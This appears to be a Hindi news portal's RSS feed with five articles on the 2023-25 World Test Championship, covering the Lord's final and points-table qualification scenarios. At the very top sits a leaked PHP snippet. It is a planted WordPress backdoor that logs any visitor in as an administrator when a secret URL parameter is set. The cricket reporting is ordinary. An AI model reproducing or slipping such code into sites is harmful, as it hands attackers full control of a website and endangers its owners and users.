// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); World Test Championship – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 07 Jan 2025 09:15:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 11 जून से शुरू होगा वर्ल्ड टेस्ट चैंपियनशिप का फ़ाइनल https://pratyushaashakinayikiran.com/?p=118372 Tue, 07 Jan 2025 09:15:00 +0000 https://pratyushaashakinayikiran.com/?p=118372 लॉर्ड्स
दक्षिण अफ़्रीका और ऑस्ट्रेलिया तीसरे वर्ल्ड टेस्ट चैंपियनशिप फ़ाइनल में आमने-सामने होंगे। ऑस्ट्रेलिया ने सिडनी में भारत को हराकर बॉर्डर-गावस्कर ट्रॉफ़ी में 3-1 से सीरीज़ जीतने के साथ ही फ़ाइनल में जगह बनाई। यह मुक़ाबला 11 से 15 जून के बीच लॉर्ड्स में खेला जाएगा। ऑस्ट्रेलिया के पास इस चक्र में अभी दो और मैच बचे हैं, जो इस महीने के अंत में श्रीलंका के ख़िलाफ़ श्रीलंका में होंगे। लेकिन अगर वे 0-2 से हार भी जाते हैं, तब भी भारत या श्रीलंका में से कोई भी टीम उन्हें वर्ल्ड टेस्ट चैंपियनशिप टेबल के शीर्ष दो स्थानों से नहीं हटा सकेगी। अगर श्रीलंका 2-0 से यह सीरीज़ जीतता है, तो वह 53.85 प्रतिशत अंकों तक पहुंच सकता है। लेकिन ऑस्ट्रेलिया वर्तमान में 63.73 प्रतिशत अंक पर है और वह अगले दो मैच हार भी गया तो 57.02 प्रतिशत अंक पर रहेगा। वहीं भारत इस डब्ल्यूटीसी चक्र को 50 प्रतिशत अंकों के साथ समाप्त कर चुका है। ऑस्ट्रेलिया के लिए फ़ाइनल में जगह गंवाने का एकमात्र रास्ता यह है कि वे श्रीलंका में होने वाले दोनों मैचों में आठ पेनल्टी प्वाइंट गंवाएं, जो लगभग असंभव है।

दक्षिण अफ़्रीका फ़ाइनल में पहुंचने वाली पहली टीम बनी थी। उन्होंने वेस्टइंडीज़, बांग्लादेश (2008 के बाद एशिया में पहली सीरीज़ जीत) और श्रीलंका के ख़िलाफ़ सीरीज़ जीती, जबकि भारत के ख़िलाफ़ घरेलू सीरीज़ ड्रॉ रही और न्यूज़ीलैंड में उन्हें हार का सामना करना पड़ा, जहां उन्होंने कमज़ोर टीम के साथ दौरा किया था। वर्ल्ड टेस्ट चैंपियनशिप फ़ाइनल में जगह बनाना दक्षिण अफ़्रीका के लिए सपनों की तरह रहा, जो इस साल की शुरुआत में पुरुष और महिला टी20 वर्ल्ड कप में उपविजेता भी रहे थे।

दक्षिण अफ़्रीका के कप्तान तेम्बा बवुमा ने पिछले हफ़्ते फ़ाइनल में क्वालिफ़ाई करने के बाद कहा, "यह सभी के लिए एक बड़ी मेहनत का परिणाम है, और ऐसा लगता है कि पिछले 12 महीनों की कड़ी मेहनत रंग लाई है। अलग-अलग मौक़ों पर अलग-अलग खिलाड़ियों ने अहम योगदान दिया है। मैं हमारे कोच शुकरी कॉनराड का विशेष रूप से धन्यवाद देना चाहता हूं। उन्होंने हमारे अंदर जो विश्वास भरा है, वह हमारी सफलता की कुंजी रही है।"

उन्होंने आगे कहा, "लॉर्ड्स में वर्ल्ड टेस्ट चैंपियनशिप फ़ाइनल खेलना किसी भी क्रिकेटर के लिए सपने के सच होने जैसा है। यह एक बड़ा अवसर है, और हम इसे पूरी तरह जीने के लिए उत्साहित हैं।"

वहीं ऑस्ट्रेलिया के कप्तान कमिंस ने कहा, "हमारे लिए वर्ल्ड टेस्ट चैंपियनशिप की बहुत अहमियत हैं। यह एक ऐसी ट्रॉफ़ी है, जिसे हम गर्व से देखते हैं। साथ ही इस ख़िताब की रक्षा करने के लिए हम बहुत उत्साहित हैं। मुझे लगता है कि यह एक बेहतरीन टूर्नामेंट है क्योंकि इसमें लगातार अच्छा प्रदर्शन करना होता है और अलग-अलग परिस्थितियों में अलग-अलग टीमों के ख़िलाफ़ खेलना होता है। हम फ़ाइनल खेलने के लिए काफ़ी उत्साहित हैं।"

यह पहली बार है जब भारत वर्ल्ड टेस्ट चैंपियनशिप के फ़ाइनल में नहीं पहुंचा है। इससे पहले के दो संस्करणों में वह न्यूज़ीलैंड और ऑस्ट्रेलिया के ख़िलाफ़ उपविजेता रहा था।

 

]]>
विश्व टेस्ट चैंपियनशिप के फाइनल में कैसे पहुंच सकता है भारत https://pratyushaashakinayikiran.com/?p=111566 Thu, 19 Dec 2024 17:47:00 +0000 https://pratyushaashakinayikiran.com/?p=111566 नई दिल्ली
भारत और ऑस्ट्रेलिया के बीच ब्रिसबेन में तीसरा टेस्टई ड्रॉ होने का मतलब है कि यहां से भारत को बॉर्डर-गावस्ककर ट्रॉफ़ी के बचे अपने दोनों मैच क्वाेलि‍फ़ाई करने के लिए जीतने होंगे, अगर वह दूसरे परिणामों पर निर्भर नहीं रहना चाहते हैं। भारत की दो जीत का मतलब है कि उनका जीत का प्रतिशत 60.53 हो जाएगा, जबकि ऑस्ट्रे लिया, श्रीलंका से 2-0 से सीरीज़ जीतने के बाद भी 57.02 प्रतिशत अंक ही ला पाएगा। दूसरी ओर अगर भारत एक टेस्टह जीतता है और एक ड्रॉ करता है तो उनके 57.02 प्रतिशत अंक होंगे और ऑस्ट्रेेलिया तभी उनसे आगे निकल सकता है जब वे श्रीलंका को 2-0 से हराए, तब ऑस्ट्रेरलिया के 58.77 प्रतिशत अंक हो जाएंगे। अगर भारत 2-1 से सीरीज़ जीत जाता है तो ऑस्ट्रे लिया को श्रीलंका को 1-0 से अधिक के अंतर से हराना होगा या दक्षिण अफ़्रीका पाकिस्ता न से कम से कम 0-1 से हार जाए।
अगर सीरीज़ 2-2 से ड्रॉ हो : तब भारत 55.26 प्रतिशत पर अंत करेगा और तब ऑस्ट्रेतलिया को श्रीलंका से कम से कम 1-0 से हार झेलनी होगी या दक्षिण अफ़्रीका को पाकिस्तापन से 2-0 से हारना होगा।

अगर सीरीज़ 1-1 से ड्रॉ पर रहे : तब भारत 53.51 जीत प्रतिशत पर समाप्त् करेगा, दक्षिण अफ़्रीका को तब दोनों टेस्ट़ हारने होंगे या ऑस्ट्रे लिया को श्रीलंका से सीरीज़ 1-0 से हारनी होगी या 0-0 से ड्रा करनी होगी। अगर दोनों सीरीज़ ड्रॉ होती हैं तो ऑस्रेे  लिया और भारत के 53.51 प्रतिशत अंक रह जाएंगे, लेकिन भारत इस चक्र में अधिक सीरीज़ जीतने की वजह से आगे बढ़ जाएगा, लेकिन श्रीलंका 2-0 से जीतता है तो वे भारत से आगे बढ़ जाएंगे।

अगर भारत 1-2 से हारता है : तब भारत के 51.75 प्रतिशत जीत अंक होंगे और वह फ़ाइनल की रेस से बाहर हो जाएगा। तब ऑस्ट्रे लिया और दक्षिण अफ़्रीका फ़ाइनल में पहुंच जाएंगे, फ‍िर चाहे वे अपने अगले मैच हार जाएं, जहां श्रीलंका ऑस्ट्रे लिया को 2-0 से हराने के बावजूद केवल 53.85 प्रतिशत जीत अंक पर ही रह पायेगा।

 

]]>
विश्व टेस्ट चैंपियनशिप के खिताबी मुकाबले में भारतीय टीम सहित चार टीमें क्वालीफाई करने की दौड़ में https://pratyushaashakinayikiran.com/?p=79530 Fri, 04 Oct 2024 09:06:00 +0000 https://pratyushaashakinayikiran.com/?p=79530 नई दिल्ली

बांग्लादेश के खिलाफ टेस्ट सीरीज में भारतीय टीम को मिली जीत के बाद विश्व टेस्ट चैंपियनशिप (डब्लूटीसी) की अंक तालिका में भारत काफी मजबूत स्थिति में पहुंच गया है। हालांकि डब्लूटीसी के फाइनल में जगह बनाने के लिए रोहित शर्मा एंड कंपनी को अभी कई और जीत की आवश्यकता है। मौजूदा डब्लूटीसी चक्र में 26 टेस्ट मैच शेष हैं और पहले दो स्थान में जगह बनाने की दौड़ काफी रोमांचक होती जा रही है। एक नजर डालते हैं कि अभी तमाम टीमें किस स्थिति में हैं।

श्रीलंका- प्रतिशत अंक – 55.56, शेष सीरीज – दक्षिण अफ्रीका (2 टेस्ट, बाहर), ऑस्ट्रेलिया (2 टेस्ट, घर पर)
न्यूजीलैंड की टीम को श्रीलंका ने बीती टेस्ट सीरीज में 2-0 से मात दी थी। इस शानदार जीत की वजह से श्रीलंका की टीम को 24 महत्वपूर्ण अंक हासिल हुए हैं। इस कारण से श्रीलंका की टीम भी अब डब्लूटीसी फाइनल में पहुंचने की दावेदार बन गई है। उनके शेष चार टेस्ट मैच उन दो टीमों के विरुद्ध हैं, जो खुद भी डब्लूटीसी फाइनल खेलने की प्रबल दावेदार हैं।

अगर श्रीलंका की टीम धीमी ओवर गति के कारण बिना कोई अंक गंवाए चारों मैच जीत लेती है तो उनके पास 69.23 प्रतिशत अंक हो जाएंगे और तब वे अन्य टीमों के नतीजों पर निर्भर नहीं रहेंगे। हालांकि अगर वह एक मैच हार जाते हैं और तीन में उन्हें जीत मिलती है तब ऐसी स्थिति में उनके पास 61.54 प्रतिशत अंक होंगे लेकिन इसके बावजूद उनके फाइनल में पहुंचने की संभावना बनी रहेगी।

भारत- प्रतिशत अंक: 74.24, शेष सीरीज : न्यूजीलैंड (3 टेस्ट, घर पर) और ऑस्ट्रेलिया (5 टेस्ट, बाहर)
कानपुर में बेहतरीन जीत हासिल करने के बाद भारत अंक तालिका में शीर्ष पर और भी मजबूत हो गया है। शेष सभी मैच जीतने पर उनके 85.09 प्रतिशत अंक हो जाएंगे। हालांकि उनकी कोशिश यही होगी कि वह कम से कम इतने अंक हासिल कर लें कि डब्लूटीसी फाइनल खेलने के लिए उन्हें अन्य नतीजों पर निर्भर न रहना पड़े। इसके लिए उन्हें कम से कम चार टेस्ट मैच जीतने होंगे और दो टेस्ट मैच ड्रॉ (56 अंक) कराने होंगे। जिसकी बदौलत वह 67.54 प्रतिशत अंक तक पहुंच जाएंगे।

दक्षिण अफ्रीका अगर अपने शेष सभी छह टेस्ट जीत लेती है तब वह 69.44 अंकों तक पहुंच सकती है। वहीं अगर ऑस्ट्रेलिया चार टेस्ट जीतती है और दो टेस्ट ड्रॉ समाप्त होता है (यह मानते हुए कि वह भारत से एक टेस्ट हारती है, और दो ड्रॉ होता है जबकि अन्य चार टेस्ट जीत लेती है) तब वह 64.04 अंकों तक ही पहुंच सकती है। अगर भारत को 56 से कम अंक हासिल होते हैं तब हो सकता है कि वह शीर्ष दो स्थानों में न रहें।

अगर वह चार मैच जीतते हैं और एक मैच ड्रॉ होता है (52 अंक) तब ऐसा संभव है कि ऑस्ट्रेलिया और दक्षिण अफ्रीका भारत से आगे निकल जाएं। श्रीलंका भी 67 से अधिक प्रतिशत अंक के साथ अंक तालिका समाप्त कर सकती है लेकिन उन्हें यहां तक पहुंचने के लिए दक्षिण अफ्रीका और ऑस्ट्रेलिया के खिलाफ जीत हासिल करनी होगी जो कि भारत के पक्ष में ही काम करेगा।

बांग्लादेश- प्रतिशत अंक : 34.38, शेष सीरीज: वेस्टइंडीज (2 टेस्ट, बाहर), दक्षिण अफ्रीका (2 टेस्ट, घर पर)
भारत के खिलाफ दो मैच हारने के बाद बांग्लादेश 45.83% प्रतिशत अंक से 34.38 तक पहुंच गई है। अगर वे अपने शेष चार मैच भी जीत लेते हैं तब भी वह 56.25 प्रतिशत अंकों तक ही पहुंच पाएंगे, जो कि शीर्ष दो स्थान तक पहुंचने के लिए काफी नहीं होंगे।

न्यूजीलैंड- प्रतिशत अंक : 37.50, शेष सीरीज : भारत (3 टेस्ट, बाहर), इंग्लैंड (3 टेस्ट, घर पर)
कागज पर न्यूजीलैंड अभी भी अपने शेष सभी छह मैच जीतकर 64.29 प्रतिशत अंक तक पहुंच सकती है, लेकिन उनका हालिया फॉर्म इस संभावना के सच होने की उम्मीद पैदा नहीं करता। उनके अगले तीन टेस्ट भारत में भारत के खिलाफ हैं, जिसे उसके घर पर हराना किसी भी अन्य मजबूत टीम के लिए मुश्किल रहता है। अगर न्यूजीलैंड शेष छह में से चार मैच जीतती है और दो हार जाती है तब भी उनके खाते में 50 प्रतिशत अंक होंगे।

ऑस्ट्रेलिया- प्रतिशत अंक : 62.50, शेष सीरीज : भारत (5 टेस्ट, घर पर), श्रीलंका (2 टेस्ट, घर पर)
ऑस्ट्रेलिया अभी 62.5 प्रतिशत अंकों के साथ तालिका में दूसरे स्थान पर है और अगर वह अपने सभी सात मैच जीत जाती है तब उसके खाते में 76.32 प्रतिशत अंक हो सकते हैं। जिन दो टीमों, भारत और श्रीलंका के खिलाफ उसे दो श्रृंखलाएं खेलनी हैं वे भी फाइनल में पहुंचने के प्रबल दावेदार हैं।

पांच जीत उन्हें 65.79 प्रतिशतअंकों तक पहुंचाएगी लेकिन भारत और दक्षिण अफ्रीका तब भी ऑस्ट्रेलिया से आगे जाने की स्थिति में होंगे। भारत के खिलाफ श्रृंखला शुरु होने से चीजें स्पष्ट होने लगेंगी, क्योंकि तब तक भारत न्यूजीलैंड के खिलाफ घर पर टेस्ट श्रृंखला खेल चुका होगा।

दक्षिण- अफ्रीका प्रतिशत अंक : 38.89, शेष सीरीज : श्रीलंका, (2 टेस्ट, घर पर), पाकिस्तान (2 टेस्ट, घर पर), बांग्लादेश (2 टेस्ट, बाहर)
अगर दक्षिण अफ्रीका अपने सभी शेष मैच जीत लेता है तब उनके खाते में 69.44 प्रतिशत अंक होंगे जो कि फाइनल में जगह बनाने के लिए काफी होंगे। क्योंकि तब भारत और ऑस्ट्रेलिया में से कोई एक ही इस आंकड़े को पार कर पाएगा। पांच मैच में जीत और एक मैच ड्रा होने पर दक्षिण अफ्रीका के पास 63.89 प्रतिशत अंक होंगे और तब भी वह दावेदार बने रहेंगे। जबकि पांच में जीत और एक में हार नसीब होने पर उनके खाते में 61.11 प्रतिशतअंक होंगे, उनकी दावेदारी तब भी बनी रहेगी लेकिन ऐसी स्थिति में उन्हें अन्य नतीजों पर अधिक रहना पड़ेगा।

इंग्लैंड- प्रतिशत अंक : 42.19, शेष सीरीज : पाकिस्तान (3 टेस्ट, बाहर), न्यूजीलैंड (3 टेस्ट, बाहर)
श्रीलंका के खिलाफ अंतिम टेस्ट में इंग्लैंड की हार ने यह तय कर दिया है कि वह इस चक्र में 60 प्रतिशत अंकों से आगे नहीं जा सकते। अपने शेष सभी छह टेस्ट जीतकर वह 57.95 अंकों तक ही पहुंच सकते हैं। ऐसी स्थिति में भी उन्हें अन्य नतीजों पर निर्भर रहना होगा।

पाकिस्तान- प्रतिशत अंक : 19.05, शेष सीरीज : इंग्लैंड (3 टेस्ट, घर पर), दक्षिण अफ्रीका (2 टेस्ट, बाहर), वेस्टइंडीज (2 टेस्ट, घर पर)
बांग्लादेश के खिलाफ पाकिस्तान को न सिर्फ दो टेस्ट मैचों में हार मिली बल्कि धीमी ओवर गति रेट के चलते उन्हें छह अंकों का नुकसान भी उठाना पड़ा। इसके चलते उनका प्रतिशत अंक 36.66 से 19.05 के आंकड़े पर आ गया है। यहां से अगर वह शेष सात मैच जीत भी लेते हैं तब भी वह अधिकतम 59.52 प्रतिशत अंकों तक ही पहुंच सकते हैं। पाकिस्तान का हालिया फॉर्म यह नहीं दर्शाता कि वह यहां तक पहुंच पाएंगा।

वेस्टइंडीज- प्रतिशत अंक : 18.52, शेष सीरीज : बांग्लादेश (2 टेस्ट, घर पर), पाकिस्तान (2 टेस्ट, बाहर)
वेस्टइंडीज ने अब तक चार श्रृंखलाएं खेल ली हैं और इस दौरान वह 108 में से 20 अंक ही हासिल कर पाए हैं। अगर वह शेष चार टेस्ट मैच जीत भी लेते हैं तब भी वह 43.59 प्रतिशत अंकों तक ही पहुंच पाएगा।

]]>
श्रीलंकाई कप्तान धनंजय डी सिल्वा ने डब्ल्यूटीसी फाइनल की संभावनाओं को नकारा https://pratyushaashakinayikiran.com/?p=77538 Mon, 30 Sep 2024 15:20:00 +0000 https://pratyushaashakinayikiran.com/?p=77538 गाले
श्रीलंका न्यूजीलैंड के खिलाफ घरेलू मैदान पर 2-0 की शानदार जीत के बाद विश्व टेस्ट चैंपियनशिप 2023-25 की तालिका में भारत और ऑस्ट्रेलिया के बाद तीसरे स्थान पर पहुंच गया है, श्रीलंका को इस चक्र में चार टेस्ट और खेलने हैं, जिनमें दो दक्षिण अफ्रीका में और दो ऑस्ट्रेलिया के खिलाफ घरेलू मैदान पर हैं। श्रीलंका ने अब लगातार तीन टेस्ट जीते हैं, जिसकी शुरुआत इस महीने की शुरुआत में ओवल में इंग्लैंड के खिलाफ यादगार जीत से हुई थी। इसके बाद वे न्यूजीलैंड के खिलाफ घरेलू मैदान पर दो मैचों की सीरीज जीती, श्रीलंकाई टीम ने पहला मैच 63 रन से और दूसरा मैच एक पारी और 154 रन से जीता।

धनंजय ने मैच के बाद टेस्ट फाइनल में पहुंचने की दौड़ में शामिल होने के बारे में पूछे जाने पर कहा, हम केवल एक मैच से दूसरे मैच तक ही सीमित रह गए हैं। अगर आप बहुत आगे की ओर देखते हैं तो आप तत्काल महत्वपूर्ण चीजों को मिस कर सकते हैं। यह वही है जो मैं हमेशा युवा खिलाड़ियों से कहता हूं, अगर आप एक मैच से दूसरे मैच तक वही करते हैं जो जरूरी है, तो अंक तालिका में जो होना चाहिए वह खुद ही हो जाएगा।

हालांकि, श्रीलंका के कप्तान को गर्व है कि उन्होंने टीम को आईसीसी टेस्ट रैंकिंग में 5वें स्थान पर पहुंचा दिया है। धनंजय ने कहा, मैं छह साल से टीम का हिस्सा हूं और हम हमेशा रैंकिंग में ऊपर आना चाहते थे, लेकिन हमने कोशिश की और असफल रहे। हम सही टीम नहीं बना पाए, लेकिन अब हमारे पास यह है। और अब हमारे पास ऐसे संयोजन भी हैं जो किसी भी सतह पर काम कर सकते हैं, चाहे वह घरेलू हो या विदेशी।

दूसरे टेस्ट में श्रीलंका की बड़ी जीत न्यूजीलैंड को पहली पारी में रनों के पहाड़ के नीचे दबाने के परिणामस्वरूप हुई, जब उन्होंने पारी घोषित करने से पहले 602/5 रन बनाए। धनंजय ने पारी घोषित की, जब कामिंदु मेंडिस 182 रन पर बल्लेबाजी कर रहे थे, लेकिन उन्होंने अपने फैसले का समर्थन किया, जबकि बल्लेबाज दोहरे शतक से केवल 18 रन दूर था। धनंजय ने कहा, कामिंडू के दोहरे शतक से ज़्यादा मैं चाहता था कि कुसल मेंडिस शतक बनाए क्योंकि उसने काफ़ी समय से शतक नहीं बनाया था। लेकिन जब हम मैच में उस मुकाम पर पहुँचे, तो मुझे लगता है कि यह सबसे अच्छा फ़ैसला था। कामिंडू खुद भी इस फ़ैसले से सहमत थे।

कामिंदू ने कहा, हमने बोर्ड पर एक बड़ा स्कोर बनाया था, लंच के समय भी मेरे पास 136 रन थे। इसलिए तब भी योजना थोड़ी और रन बनाने की थी और फिर उन्हें बल्लेबाजी के लिए बुलाना था। मुझे लगता है कि यह निर्णय सही समय पर लिया गया था क्योंकि हम सभी जानते हैं कि गाले में आखिरी घंटे में बल्लेबाजी करना काफी मुश्किल है और मुझे लगता है कि यह उस निर्णय की वजह से था कि हम अगली सुबह उन्हें आउट करने में सक्षम थे।

न्यूजीलैंड को सिर्फ 88 रन पर आउट करने और फॉलो-ऑन लागू करने के बाद, श्रीलंका की जीत स्पिनर निशान पीरिस के चौथी पारी में छह विकेट लेने पर निश्चित हुई। धनंजय ने खेल के लिए उन्हें चुनने के अपने फैसले को सही ठहराने के लिए डेब्यू करने वाले खिलाड़ी की सराहना की।

धनंजय ने कहा, निशान ने काफी समय तक घरेलू क्रिकेट में बहुत अच्छी गेंदबाजी की है और मैंने इस बात पर जोर दिया था कि ऐसा गेंदबाज लाया जाए जो दूसरे छोर पर प्रभात [जयसूर्या] के साथ इकॉनमी रेट को कम रख सके, खासकर टर्निंग ट्रैक पर। इस तरह आप विपक्ष पर दबाव बना सकते हैं, और मुझे लगता है कि उन्होंने इस खेल में अपना काम बेहतरीन तरीके से किया।

 

]]>
WTC फाइनल 2025 की तारीख की हुई घोषणा, इस मैदान पर होगा महामुकाबला https://pratyushaashakinayikiran.com/?p=65703 Tue, 03 Sep 2024 19:13:00 +0000 https://pratyushaashakinayikiran.com/?p=65703 लॉर्ड्स

वर्ल्ड टेस्ट चैंपियनशिप 2023-25 चक्र का फाइनल मुकाबला अगले साल इंग्लैंड में होना है और अब आईसीसी ने इस मुकाबले की तारीख और वेन्यू का ऐलान कर दिया है। आईसीसी के मुताबिक अगले साल खिताब के लिए खेला जाने वाला यह एकमात्र मुकाबला 11 से 15 जून के बीच खेला जाएगा, जबकि 16 जून का दिन रिजर्व डे के रूप में रखा गया है। वहीं, इस मैच के लिए वेन्यू के रूप में लंदन के लॉर्ड्स मैदान को चुना गया है, जिसे क्रिकेट का मक्का भी कहा जाता है। वर्ल्ड टेस्ट चैंपियनशिप के इतिहास का यह तीसरा फाइनल मैच होगा और पहली बार इसका आयोजन लॉर्ड्स में होगा।

आईसीसी ने बताया कि डब्ल्यूटीसी के तीसरे सीजन का खिताबी मुकाबला 11 से 15 जून 2025 तक ऐतिहासिक लंदन के लॉर्ड्स मैदान पर आयोजित होगा. बोर्ड ने बताया कि अगर जरूरत पड़ी तो 16 जून को रिजर्व डे भी होगा. यह पहली बार होगा कि लॉर्ड्स में विश्व टेस्ट चैम्पियनशिप का फाइनल खेला जाएगा.

इससे पहले, ओवल के मैदान पर 2021 और 2023 का डब्ल्यूटीसी फाइनल खेला गया था. दोनों बार भारतीय टीम फाइनल में पहुंची थी और दोनों बार उसे क्रमशः न्यूजीलैंड और ऑस्ट्रेलिया के हाथों हार का सामना करना पड़ा था.

भारत-ऑस्ट्रेलिया के बीच फिर होगा फाइनल?

वर्ल्ड टेस्ट चैंपियनशिप का फाइनल भारत और ऑस्ट्रेलिया के बीच हो सकता है. अंक तालिका की बात करें तो फिलहाल टीम इंडिया 9 मैचों में 6जीत और 68.52 PCT के साथ टॉप पर चल रही है. ऑस्ट्रेलिया 12 टेस्ट में 8 जीत और 62.50 PCT के साथ दूसरी पोजिशन पर है. न्यूजीलैंड तीसरे और इंग्लैंड चौथे स्थान पर है. वैसे तो अभी टीम इंडिया को वर्ल्ड टेस्ट चैंपियनशिप में 10 टेस्ट मैच और खेलने हैं. उसे बांग्लादेश से 2, न्यूजीलैंड से 3 और ऑस्ट्रेलिया के खिलाफ 5 टेस्ट मैच खेलने हैं. इन मुकाबलों में हार-जीत और ड्रॉ जाहिर तौर पर अंक तालिका का समीकरण बदल सकता है.
रोहित शर्मा बनाएंगे WTC चैंपियन

रोहित शर्मा ने हाल ही में टीम इंडिया को टी20 वर्ल्ड कप जिताया है. पूरे 11 साल के बाद टीम इंडिया आईसीसी टूर्नामेंट जीती. अब रोहित शर्मा चाहेंगे कि उनकी कप्तानी में टीम इंडिया टेस्ट की भी वर्ल्ड चैंपियन बने. इससे पहले भारत दो बार वर्ल्ड टेस्ट चैंपियनशिप के फाइनल में पहुंचा और दोनों ही बार उसे हार का मुंह देखना पड़ा. पहले उसे न्यूजीलैंड ने मात दी और फिर ऑस्ट्रेलिया ने उसे हराया. अब टीम इंडिया लॉर्ड्स में ना सिर्फ फाइनल खेलना चाहेगी बल्कि वो उसे जीतना भी चाहेगी. रोहित शर्मा की टीम दमदार है. उसके बल्लेबाज और खासतौर पर गेंदबाज कमाल की फॉर्म में हैं. उम्मीद है कि रोहित एंड कंपनी लॉर्ड्स की बालकनी में वर्ल्ड चैंपियन बनने का जश्न मनाते नजर आए.

]]>